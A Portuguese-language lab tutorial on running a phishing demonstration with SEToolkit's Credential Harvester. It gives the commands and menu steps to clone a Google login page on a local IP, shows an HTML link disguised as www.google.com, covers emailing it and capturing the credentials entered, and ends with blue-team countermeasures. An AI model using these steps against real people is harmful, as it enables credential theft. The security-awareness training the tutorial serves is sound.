Tutorial: Demonstração de Ataques de Engenharia Social com SEToolkit

⚠️ AVISO LEGAL: Este tutorial é exclusivamente para fins educacionais e testes em ambiente controlado. Use apenas em sistemas próprios ou com autorização explícita. O uso indevido é crime.

Objetivo

Task 1: Configurando o Credential Harvester

Passo 1: Iniciando o SEToolkit

# Abrir terminal no Kali Linux

sudo setoolkit

Passo 2: Navegando pelos Menus

1. Selecione: 1) Social-Engineering Attacks
2. Selecione: 2) Website Attack Vectors
3. Selecione: 3) Credential Harvester Attack Method
4. Selecione: 1) Web Templates

Passo 3: Configuração do Ataque

• No prompt de IP: Insira seu endereço IP local e pressione Enter

• IP address for the POST back in Harvester/Tabnabbing: 192.168.0.18
  
  

• Template: Selecione 2) Google

Passo 4: Verificação

• ✅ Confirme que o ataque foi lançado
• ✅ Verifique que a porta 80 está aberta
• ✅ O servidor web falso está rodando

Task 2: Criando o Email de Phishing

Pré-requisito: Instalar Thunderbird

sudo apt update && sudo apt install thunderbird

Passo 1: Configurar Email

1. Abra o Thunderbird
2. Configure uma conta Gmail válida
3. Crie um novo email para andre@basetic.com.br

Passo 2: Inserir Link Malicioso

1. Clique em: Insert → HTML
2. Insira o código:

   <a href="http://192.168.0.18">www.google.com</a>
   
   

3. Envie o email

Task 3: Simulando a Vítima

Passo 1: Acessar o Email

• Abra o email enviado
• Observe: O link parece legítimo (www.google.com)

Passo 2: Executar o "Clique"

1. Clique no link malicioso
2. Você será redirecionado para a página falsa do Google

Passo 3: Inserir Credenciais (Simulação)

1. Digite usuário e senha fictícios

1. Clique em "Sign in"
2. Resultado: Redirecionamento automático para o Google real

Passo 4: Verificar Captura no Kali

# No terminal do SEToolkit, verifique:

# As credenciais capturadas aparecerão automaticamente

🛡️ Contramedidas Blue Team

Como Detectar:

• URL Inspection: Sempre verificar o URL real antes de clicar
• SSL Certificate: Sites legítimos têm certificados válidos
• Email Headers: Analisar cabeçalhos para detectar spoofing

Como Prevenir:

• Treinamento de Conscientização
• Filtros de Email Anti-Phishing
• 2FA (Autenticação de Dois Fatores)
• DNS Filtering

Ferramentas de Detecção:

• PhishTank: Verificação de URLs suspeitas
• VirusTotal: Análise de links
• Email Security Gateways

📊 Métricas de Sucesso (Blue Team)

• Taxa de Cliques: Quantos usuários clicaram no link
• Taxa de Submissão: Quantos inseriram credenciais
• Tempo de Detecção: Quanto tempo levou para detectar o ataque
• Eficácia do Treinamento: Melhoria após conscientização